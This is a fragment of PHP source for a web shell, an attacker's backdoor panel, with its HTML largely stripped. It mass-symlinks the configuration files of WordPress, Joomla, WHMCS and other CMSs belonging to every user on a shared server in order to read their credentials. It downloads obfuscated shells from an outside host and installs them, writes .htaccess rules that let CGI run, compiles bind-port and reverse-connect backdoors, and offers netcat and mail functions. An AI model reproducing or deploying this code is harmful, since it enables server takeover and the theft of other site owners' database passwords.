symlink($owner['dir'].'/'.$dir[3].'/new/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/site/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/web/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/v1/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/v2/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/v3/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/v4/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/v5/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/conf_global.php',"tmp/".$owner['name'].'-IPB.txt'); symlink($owner['dir'].'/'.$dir[3].'/inc/config.php',"tmp/".$owner['name'].'-MyBB.txt'); symlink($owner['dir'].'/'.$dir[3].'/Settings.php',"tmp/".$owner['name'].'-SMF.txt'); symlink($owner['dir'].'/'.$dir[3].'/sites/default/settings.php',"tmp/".$owner['name'].'-Drupal.txt'); symlink($owner['dir'].'/'.$dir[3].'/e107_config.php',"tmp/".$owner['name'].'-e107.txt'); symlink($owner['dir'].'/'.$dir[3].'/datas/config.php',"tmp/".$owner['name'].'-Seditio.txt'); symlink($owner['dir'].'/'.$dir[3].'/includes/configure.php',"tmp/".$owner['name'].'-osCommerce.txt'); symlink($owner['dir'].'/'.$dir[3].'/client/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/clientes/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/support/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/supportes/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/whmcs/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/domain/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/hosting/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/whmc/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/billing/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/order/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/clientarea/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); symlink($owner['dir'].'/'.$dir[3].'/domains/configuration.php',"tmp/".$owner['name'].'-WHMCS.txt'); } } } $etc=file_get_contents("/etc/passwd"); $etcz=explode("\n",$etc); foreach($etcz as $etz) { $etcc=explode(":",$etz); error_reporting(0); $current_dir=posix_getcwd(); $dir=explode("/",$current_dir); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/home/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/main/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/new/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wordpress/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v1/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v2/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v3/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v4/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v5/wp-config.php','tmp/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config/koneksi.php','tmp/'.$etcc[0].'-Lokomedia.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/konfigurasi/koneksi.php','tmp/'.$etcc[0].'-Formulasi.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/lib/config.php','tmp/'.$etcc[0].'-Balitbang.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','tmp/'.$etcc[0].'-PhpBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','tmp/'.$etcc[0].'-vBulletin.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/home/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/main/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/new/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v1/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v2/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v3/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v4/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/v5/configuration.php','tmp/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','tmp/'.$etcc[0].'-IPB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','tmp/'.$etcc[0].'-MyBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','tmp/'.$etcc[0].'-SMF.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','tmp/'.$etcc[0].'-Drupal.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','tmp/'.$etcc[0].'-e107.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','tmp/'.$etcc[0].'-Seditio.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','tmp/'.$etcc[0].'-osCommerce.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','tmp/'.$etcc[0].'-WHMCS.txt'); } function chk_header($link) { $tmp=get_headers($link,1); if(strpos($tmp[0],"200")) { return true; } else { return false; } } function Find($str,$start,$end) { $len=strlen($str); $start_pos=(strpos($str,$start)+strlen($start)); $str=substr($str,$start_pos); $end_pos=strpos($str,$end); $str=substr($str,0,$end_pos); return $str; } $pageURL='http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u=explode("/",$pageURL); $pageURL=str_replace($u[count($u)-1],"",$pageURL); function cms_add($link,$domain,$owner,$cms) { $link=$link.'-'.$cms.'.txt'; if(chk_header($link)) { $url='http://'.$domain; $str=''.$domain.''.$owner.''.$cms.''.Chr(10); file_put_contents("tmp.tmp",$str,FILE_APPEND); echo $str; } } function CurlPage($url,$post=null,$head=true) { $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_HEADER,$head); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true); curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2); curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']); curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt"); curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt"); If($post!=NULL) { curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,$post); } $urlPage=curl_exec($ch); if(curl_errno($ch)) { echo curl_error($ch); } curl_close($ch); return($urlPage); } function listall($file,$str) { if(file_exists($file)) { $do=file_get_contents($file); if(!strpos($do,$str)) { file_put_contents($file,$str,FILE_APPEND); } } else { file_put_contents($file,$str,FILE_APPEND); } } echo "
[Cms] : Symlink With Cms Detector
"; if(($_GET['x']=='cms')&&($_GET['do']=='detect')) { if(!file_exists('tmp.tmp')) { @fopen('tmp.tmp','w'); echo "
"; echo ""; $p=0; if(is_readable("/var/named")) { $list=scandir("/var/named"); $current_dir=posix_getcwd(); $dir=explode("/",$current_dir); foreach($list as $domain) { if(strpos($domain,".db")) { $domain=str_replace('.db','',$domain); $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link=$pageURL.'tmp/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } } else { echo "
DomainsUsersSymlink
"; echo ""; $content=file_get_contents($pageURL.'tmp.tmp'); echo $content; } echo "
DomainsUsersSymlink
"; } if(($_GET['x']=='cms')&&($_GET['do']=='cancms')) { if(file_exists('tmp.tmp')) { @unlink('tmp.tmp'); @exe('rm -r tmp'); } } } elseif(isset($_GET['x'])&&($_GET['x']=='port')) { echo "
"; echo "[URL] : http://".$server_ip.":13123"; echo '
Symlink Port
Port :
'; $np=$_POST['portname']; if(isset($_POST['symport'])) { $ats=gzinflate(str_rot13(base64_decode('RknULy0u0kLKzNNCzStGKKgsycjP4+XKzC3ILypECAbSOakeISEBwalScqlSCIn85OzUEjTB/G9eLgA='))); $bwh=gzinflate(str_rot13(base64_decode('co4xeMMwEIXnBvIfDi9JVZBqgacumU9VvAvFvmDRS0VB1yo/P5IwtNDxHve993o39g5NO7Og1n3fd70Y67Rh1Wnz4aMc58mSdbtpl++jZNMDCW242iU88DgM5yvSD5L8DS74/MbI62Kmc+YwFcaPX8jr//C5kk80zQGCJ94dYIXKSSDrSzQnn8AHZ8CzjRArAt5OwtuNfMoBGK44KHVgD5FW1LY/JfgyxUFORERdl0WSuSBNUzn6Uv3jqrKsePruCYt0zt8='))); $pt="port = ".$np; $r=$ats.$pt.$bwh; switch($_POST['pilihport']) { case 'pl': $f=fopen('port.pl','w'); fwrite($f,$r); echo "[ DONE ]"; @exe('perl port.pl'); break; case 'py': $f=fopen('port.py','w'); fwrite($f,$r); echo "[ DONE ]"; @exe('python port.py'); break; } } } elseif(isset($_GET['x'])&&($_GET['x']=='db')) { ?>
"; $dbshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/db.php'); $dbshellcss=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/db.css'); mkdir('db',0755); chdir('db'); $file=fopen("db.php","w+"); $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($dbshell))))); fclose($file); $file2=fopen("db.css","w+"); $write2=fwrite($file2,gzinflate(base64_decode(str_rot13(strrev($dbshellcss))))); fclose($file2); chmod("db.php",0644); chmod("db.css",0644); echo "[URL] : http://".$_SERVER['HTTP_HOST'].$alamat."/db/db.php"; if(isset($_POST['candb'])) { echo ""; chdir('db'); if(file_exists('db.php')) { @unlink('db.php'); @unlink('db.css'); chdir('..'); @rmdir('db'); } } else { echo "
"; } } elseif(isset($_GET['x'])&&($_GET['x']=='mysql')) { ?>
"; $sqlshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sql.php'); $file=fopen("sql.php","w+"); $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($sqlshell))))); fclose($file); chmod("sql.php",0644); echo "[URL] : http://".$_SERVER['HTTP_HOST'].$alamat."/sql.php"; if(isset($_POST['cansql'])) { echo ""; if(file_exists('sql.php')) { @unlink('sql.php'); } } else { echo "
"; } echo "

"; } elseif(isset($_GET['x'])&&($_GET['x']=='cpanel')) { ?>
"; $cpshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/cp.php'); $file=fopen("cp.php","w+"); $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($cpshell))))); fclose($file); chmod("cp.php",0644); echo "[URL] : http://".$_SERVER['HTTP_HOST'].$alamat."/cp.php"; if(isset($_POST['cancp'])) { echo ""; if(file_exists('cp.php')) { @unlink('cp.php'); } } else { echo "
"; } echo "

"; } elseif(isset($_GET['x'])&&($_GET['x']=='whmcs')) { ?>
"; $whmshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/whm.php'); $file=fopen("whm.php","w+"); $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($whmshell))))); fclose($file); chmod("whm.php",0644); echo "[URL] : http://".$_SERVER['HTTP_HOST'].$alamat."/whm.php"; if(isset($_POST['canwhm'])) { echo ""; if(file_exists('whm.php')) { @unlink('whm.php'); } } else { echo "
"; } echo "

"; } elseif(isset($_GET['x'])&&($_GET['x']=='ins')) { ?>
"; echo "
Install Shell
Name Folder:
Name Shell:
Type Shell:
"; $dirz=$_POST['insdir']; $namez=$_POST['insname']; $urlz=str_replace($_SERVER['DOCUMENT_ROOT'],"",@getcwd()); $met="Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py AddHandler cgi-script .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py AddHandler cgi-script .cgi .jpg .gif .png .txt .zip .rar .tar .gz .pdf .doc .xls .htm .html .bin .sh .root .sys .pl .py"; if(isset($_POST['installz'])) { if($dirz!='') { switch($_POST['ins']) { case 'pl': mkdir($dirz,0755); chdir($dirz); $tai=".htaccess"; $sem="$tai"; $sim=fopen($sem,'w')ordie("Error"); fwrite($sim,$met); fclose($sim); $cgiz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.pl'); $cgi=fopen($namez,"w+"); $write=fwrite($cgi,gzinflate(base64_decode(str_rot13(strrev($cgiz))))); fclose($cgi); chmod($namez,0755); echo "
Successfull Install ".$namez.""; break; case 'py': mkdir($dirz,0755); chdir($dirz); $tai=".htaccess"; $sem="$tai"; $sim=fopen($sem,'w')ordie("Error"); fwrite($sim,$met); fclose($sim); $cgiz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.py'); $cgi=fopen($namez,"w+"); $write=fwrite($cgi,gzinflate(base64_decode(str_rot13(strrev($cgiz))))); fclose($cgi); chmod($namez,0755); echo "
Successfull Install ".$namez.""; break; case 'asp': mkdir($dirz,0755); chdir($dirz); $aspxz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.asp'); $aspx=fopen($namez,"w+"); $write=fwrite($aspx,gzinflate(base64_decode(str_rot13(strrev($aspxz))))); fclose($aspx); chmod($namez,0755); echo "
Successfull Install ".$namez.""; break; case 'aspx': mkdir($dirz,0755); chdir($dirz); $aspxz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.aspx'); $aspx=fopen($namez,"w+"); $write=fwrite($aspx,gzinflate(base64_decode(str_rot13(strrev($aspxz))))); fclose($aspx); chmod($namez,0755); echo "
Successfull Install ".$namez.""; break; case 'jsp': mkdir($dirz,0755); chdir($dirz); $aspxz=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/shell.jsp'); $aspx=fopen($namez,"w+"); $write=fwrite($aspx,gzinflate(base64_decode(str_rot13(strrev($aspxz))))); fclose($aspx); chmod($namez,0755); echo "
Successfull Install ".$namez.""; break; } } else { echo "
Error Cannot Install ".$namez.""; } } } elseif(isset($_GET['view'])&&($_GET['view']!="")) { if(is_file($_GET['view'])) { if(!isset($file)) $file=magicboom($_GET['view']); if(!$win&&$posix) { $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner=$name['name']." : ".$group['name']; } else { $owner=$user; } $owner=$user; $filn=basename($file); echo "
Filename".$file."
Size".ukuran($file)."
Permission".substr(sprintf('%o',fileperms($file)),-4)." | ".get_perms($file)."
Owner".$owner."
Create time".date("d-M-Y H:i",@filectime($file))."
Last modified".date("d-M-Y H:i",@filemtime($file))."
Last accessed".date("d-M-Y H:i",@fileatime($file))."
Actionsedit | rename | copy | move | delete | download (gzip)
Viewtext | code | image
"; if(isset($_GET['type'])&&($_GET['type']=='image')) { echo "
"; } elseif(isset($_GET['type'])&&($_GET['type']=='code')) { echo "
"; $file=wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "
"; } else { echo "
"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "
"; } } elseif(is_dir($_GET['view'])) { echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit'])&&($_GET['edit']!="")) { if(isset($_POST['save'])) { $file=$_POST['saveas']; $filed=basename($file); $content=magicboom($_POST['content']); $cp_file=$_POST['cp_file']; if($filez=@fopen($file,"w")) { $time=date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg="file saved @ ".$time; else $msg="failed to save"; @fclose($filez); if(isset($cp_file)) { $dir_open=opendir('.'); while(false!==($filename=readdir($dir_open))) { if($filename!="."&&$filename!="..") { if(is_dir($filename)) { $link=$filename; copy($file,$pwd.$link."/".$filed); } } } closedir($dir_open); } } else $msg="permission denied"; } if(!isset($file)) $file=$_GET['edit']; if($filez=@fopen($file,"r")) { $content=""; while(!feof($filez)) { $content.=htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>

Save As Copy To All Sub Directories
"; if(isset($_POST['bind'])&&!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=='C')) { $port=trim($_POST['port']); $passwrd=trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan=exe("ps aux"); if(eregi("./bdc $por",$scan)) { $msg="

Process found running, backdoor setup successfully.

"; } else { $msg="

Process not found running, backdoor not setup successfully.

"; } } elseif(isset($_POST['bind'])&&!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=='Perl')) { $port=trim($_POST['port']); $passwrd=trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan=exe("ps aux"); if(eregi("$p2 bdp $port",$scan)) { $msg="

Process found running, backdoor setup successfully.

"; } else { $msg="

Process not found running, backdoor not setup successfully.

"; } } elseif(isset($_POST['backconn'])&&!empty($_POST['backport'])&&!empty($_POST['ip'])&&($_POST['use']=='C')) { $ip=trim($_POST['ip']); $port=trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg="Now script try connect to ".$ip." port ".$port." ..."; } elseif(isset($_POST['backconn'])&&!empty($_POST['backport'])&&!empty($_POST['ip'])&&($_POST['use']=='Perl')) { $ip=trim($_POST['ip']); $port=trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg="Now script try connect to ".$ip." port ".$port." ..."; } elseif(isset($_POST['expcompile'])&&!empty($_POST['wurl'])&&!empty($_POST['wcmd'])) { $pilihan=trim($_POST['pilihan']); $wurl=trim($_POST['wurl']); $namafile=download($pilihan,$wurl); if(is_file($namafile)) { $msg=exe($wcmd); } else $msg="error: file not found $namafile"; } ?>
Port BindingConnect BackLoad and Exploit
Port
Password
Use
IP">
Port
Use
url
cmd
'; } else { echo ''; } if(isset($_POST['cancelcmd'])) { if(file_exists('nc')) { @unlink('nc'); } } ?>
Netcat $
"; if(isset($_POST['mail_send'])) { $mail_to=$_POST['mail_to']; $mail_from=$_POST['mail_from']; $mail_subject=$_POST['mail_subject']; $mail_content=magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")) { $msg="[Mail] : Success Sent To $mail_to"; } else $msg="[Mail] : Send Failed"; } ?>
Mail To   :
From     : " name="mail_from" />
Subject :
[Bypass] : Safemode And Disable Function Was Successfull
"; } else { echo "
[Bypass] : Safemode And Disable Function With
"; } ?> [ DONE ]
"; } } elseif(isset($_GET['x'])&&($_GET['x']=='logout')) { ?>
Logout Successfull
'; } elseif(isset($_GET['x'])&&($_GET['x']=='symlinkss')) { ?>
"; if(isset($_POST['submitcmd'])) { $r=stripcslashes($_POST['file']); if(file_exists('passwd.txt')or!file_exists('passwd.txt')) { $f=@fopen('passwd.txt','w+'); $w=@fwrite($f,$r); fclose($f); } } if(isset($_POST['dellpass'])) { if(file_exists('passwd.txt')) { @unlink('passwd.txt'); @unlink('sym/.htaccess'); @unlink('sym/root'); @rmdir('sym'); } } if($wor@filesize('passwd.txt')>0) { echo "
[Symlink] : Try Read -> [ /etc/passwd ]
"; echo "
"; $fil3=file('passwd.txt'); $pageFTP='ftp://'.$_SERVER["SERVER_NAME"].$alamat; $total=0; $no=1; foreach($fil3 as $f) { $u=explode(':',$f); $user=$u['0']; $homeuser=$u['5']; echo " "; $total++; } echo "
NoUsersPathSymlink
".$no++." $user $homeuser/ Symlink
TotalsFounded ".$total." Users For Symlink
"; } else { if(isset($_POST['sympass'])) { @mkdir('sym',0755); $htaccess="Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write=@fopen('sym/.htaccess','w'); fwrite($write,$htaccess); @symlink('/','sym/root'); echo "
[Symlink] : Try Read -> [ /etc/passwd ]
"; echo "


"; } else { if(isset($_POST['symcan'])) { @unlink('sym/.htaccess'); @unlink('sym/root'); @rmdir('sym'); echo "
[Symlink] : Try Read -> [ /etc/passwd ]
"; } else { echo "
[Symlink] : Try Read -> [ /etc/passwd ]
"; } } } } elseif(isset($_GET['x'])&&($_GET['x']=='symlinks')) { ?>
"; if(isset($_POST['submitcmd'])) { $r=stripcslashes($_POST['file']); if(file_exists('passwd.txt')or!file_exists('passwd.txt')) { $f=@fopen('passwd.txt','w+'); $w=@fwrite($f,$r); fclose($f); } } if(isset($_POST['dellpass'])) { if(file_exists('passwd.txt')) { @unlink('passwd.txt'); @unlink('sym/.htaccess'); @unlink('sym/root'); @rmdir('sym'); } } if($wor@filesize('passwd.txt')>0) { echo "
[Symlink] : Try Read -> [ /etc/passwd ]
"; echo "
"; $fil3=file('passwd.txt'); $pageFTP='ftp://'.$_SERVER["SERVER_NAME"].$alamat; $total=0; $no=1; foreach($fil3 as $f) { $u=explode(':',$f); $user=$u['0']; echo " "; $total++; } echo "
NoUsersFTPSymlink
".$no++." $user FTP Symlink
TotalsFounded ".$total." Users For Symlink
"; } else { if(isset($_POST['sympass'])) { @mkdir('sym',0755); $htaccess="Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write=@fopen('sym/.htaccess','w'); fwrite($write,$htaccess); @symlink('/','sym/root'); echo "
[Symlink] : Try Read -> [ /etc/passwd ]
"; echo "


"; } else { if(isset($_POST['symcan'])) { @unlink('sym/.htaccess'); @unlink('sym/root'); @rmdir('sym'); echo "
[Symlink] : Try Read -> [ /etc/passwd ]
"; } else { echo "
[Symlink] : Try Read -> [ /etc/passwd ]
"; } } } } elseif(isset($_GET['x'])&&($_GET['x']=='symlink')) { ?>
"; $filelocation=basename(__FILE__); $read_named_conf=@file('/etc/named.conf'); if($read_named_conf) { @mkdir('sym',0755); $htaccess="Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write=@fopen('sym/.htaccess','w'); fwrite($write,$htaccess); @symlink('/','sym/root'); if(isset($_POST['cansym'])) { @unlink('sym/.htaccess'); @unlink('sym/root'); @rmdir('sym'); echo "
[Symlink] : Success Read -> [ /etc/named.conf ] "; } else { echo "
[Symlink] : Success Read -> [ /etc/named.conf ]
"; echo "


